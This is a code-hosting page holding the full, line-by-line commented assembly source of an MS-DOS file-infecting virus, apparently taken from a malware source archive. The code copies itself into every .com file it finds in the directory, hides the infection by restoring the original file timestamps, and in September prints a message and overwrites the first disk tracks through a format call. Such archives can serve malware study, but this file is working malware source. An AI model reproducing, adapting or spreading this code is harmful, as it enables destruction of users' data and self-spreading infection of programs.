MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.sad.asm
2021-01-12 17:58:25 -06:00

225 lines
9.6 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;
; ---- Data Segment Values ----
; ds:[0f6h] = read buffer location
; ds:[0f8h] = write buffer location
; ds:[0fah] = store length of virus at this location
; ds:[0fch] = store length of file to be infected at this location
; ds:[0feh] = filename of file to infect
;
.model tiny
.code
org 100h ; origin for .com files
start:
nop ; these two nop instructs will be used by 'Nasty'
nop ; to determine if a file is already infected
;******
;get date
;******
mov ah,2ah ; get the date
int 21h ; do it
cmp dh,09h ; is it September?
jnz do_not_activate ; if NO jmp do_not_activate
;****
;the nasty bit
;****
;*
;* 1. Print message
;*
lea dx,mess ; print message
mov ah,09 ; 'Nasty in September'
int 21h ; do it
;****
;* 2. Destroy disk
;****
mov ah,19h ; get current drive (returned in al)
int 21h ; do it
mov dl,al ; dl = drive # to be formated
mov ah,05 ; disk format function
mov cl,01 ; first sector
mov ch,00 ; first track
mov dh,00 ; head zero
mov al,10h ; 10h (16) sectors - 2 tracks
int 13h ; do it (overwrite first 16 tracks on currently
; selected disc)
do_not_activate:
mov cx,80h ; save parameters; set counter to 80h bytes
mov si,0080h ; offset in the current data segment of the byte
; to be copied
mov di,0ff7fh ; offset to which byte is to be moved
rep movsb ; move bytes until cx=0 (decrement cx by 1 each time
; loop is performed is done automatically)
; (increment by 1 of si & di is done automatically)
lea ax,begp ; load exit from program offset address into ax
mov cx,ax ; " " " " " " " cx
sub ax,100h ; subtract start of .com file address (100h) from ax
; ax now contains the length of the virus
mov ds:[0fah],ax ; put length of the virus into the data segment at
; offset 0fah
add cx,fso ; add fso (5h) to cx (offset address of exit)
; so, cx=cx+5
mov ds:[0f8h],cx ; move cx (end of virus + 5) into data segment at
; offset 0f8h. ** Start of the write buffer.
ADD CX,AX ; add virus length (ax) to cx ?????
mov ds:[0f6h],cx ; mov cx into data segment at offset 0f6h.
; ** Start of the read buffer
mov cx,ax ; mov length of virus into cx
lea si,start ; load address of 'start' (start of virus) into
; souce index
mov di,ds:[0f8h] ; mov the value of the write buffer (@ 0f8h) into
; destination index
rb: ; cx = counter (length of virus)
; si = offset of byte to be read
; di = offset of where to write byte to
; (auto decrement of cx & increment of si & di)
rep movsb ; copy the virus into memory
stc ; set the carry flag
lea dx,file_type_to_infect ; set infector for .com files only
mov ah,4eh ; find first file with specified params
mov cx,20h ; files with archive bit set
int 21h ; do it
; if file found, CF is cleared, else
; CF is set
or ax,ax ; works the below instructions (jz & jmp)
jz file_found ; if file found jmp file_found
jmp done ; if no file found, jmp done (exit virus)
file_found:
mov ah,2fh ; get dta (returned in es:bx)
int 21h ; do it
mov ax,es:[bx+1ah] ; mov size of file to be infected into ax
mov ds:[0fch],ax ; mov filesize into ds:[0fch]
add bx,1eh ; bx now points to asciz filename
mov ds:[0feh],bx ; mov filename into ds:[0feh]
clc ; clear carry flag
mov ax,3d02h ; open file for r/w (ds:dx -> asciz filename)
mov dx,bx ; mov filename into dx
int 21h ; do it (ax contains file handle)
mov bx,ax ; mov file handle into bx
mov ax,5700h ; get time & date attribs from file to infect
int 21h ; do it (file handle in bx)
push cx ; save time to the stack
push dx ; save date to the stack
mov ah,3fh ; read from file to be infected
mov cx,ds:[0fch] ; number of bytes to be read (filesize of file to
; be infected
mov dx,ds:[0f6h] ; buffer (where to read bytes to)
int 21h ; do it
mov bx,dx ; mov buffer location to bx
mov ax,[bx] ; mov contents of bx (first two bytes - as bx is
; 16-bits) into ax.
; Now check to see if file is infected... if the
; file is infected, it's first two bytes will be
; 9090h (nop nop)
sub ax,9090h ; If file is already infected, zero flag will be set
; thus jump to fin(ish)
jz fin
mov ax,ds:[0fch] ; mov filesize of file to be infected into ax
mov bx,ds:[0f6h] ; mov where-to-read-to buffer into bx
mov [bx-2],ax ; correct old len
mov ah,3ch ; Create file with handle
mov cx,00h ; cx=attribs -- set no attributes
mov dx,ds:[0feh] ; point to name
clc ; clear carry flag
int 21h ; create file
; Note: If filename already exists, (which it does)
; truncate the filelength to zero - this is ok as
; we have already copied the file to be infected
; into memory.
mov bx,ax ; mov file handle into bx
mov ah,40h ; write file with handle (write to the file to be
; infected) - length currently zero
; cx=number of bytes to write
mov cx,ds:[0fch] ; length of file to be infected
add cx,ds:[0fah] ; length of virus
mov DX,ds:[0f8h] ; location of write buffer (this contains the virus
; + the file to be infected)
int 21h ; write file
; new file = virus + file to be infected
mov ax,5701h ; restore original time & date values
pop dx ; get old date from the stack
pop cx ; get old time from the stack
int 21h ; do it
; Note: Infected file will now carry the time & date
; it had before the infection.
mov ah,3eh ; close file (bx=file handle)
int 21h ; do it
; Note: date & time stamps automatically updated if
; file written to.
fin:
stc ; set carry flags
mov ah,4fh ; find next file (.com)
int 21h ; do it
or ax,ax ; decides zero flag outcome
jnz done ; if no more .com files, jmp done
JMP file_found ; else begin re-infection process for new file.
done:
mov cx,80h ; set counter (cx) = 80h
mov si,0ff7fh ; source offset address (copy from here)
mov di,0080h ; destination offset address (copy to here)
rep movsb ; copy bytes! (cx is auto decremented by 1
; si & di are auto incremented by 1)
; Note: this is a 'restore parameters' feature
; this does the reverse of what what done earlier
; in the program (do_not_activate:)
mov ax,0a4f3h ;
mov ds:[0fff9h],ax ;
mov al,0eah ;
mov ds:[0fffbh],al ; reset data segment locations ??? (to previous
mov ax,100h ; values before virus infection)
mov ds:[0fffch],ax ;
lea si,begp ; load exit from program offset address into si
lea di,start ; load offset address of start of virus into di
mov ax,cs
mov ds:[0fffeh],ax ; re-align cs = ds ???
mov kk,ax
mov cx,fso
db 0eah ; define byte
dw 0fff9h ; define word
kk dw 0000h ; define kk = word
mess db 'Sad virus - 24/8/91',13,10,'$' ; virus message to display
file_type_to_infect db '*?.com',0 ; infect only .com files.
fso dw 0005h ; store 5 into 'fso'. dw means that fso is 2 bytes
; in size (a word)
; ----- alma mater
begp:
mov ax,4c00h ; normal dos termination (set al to 00)
int 21h ; do it
end start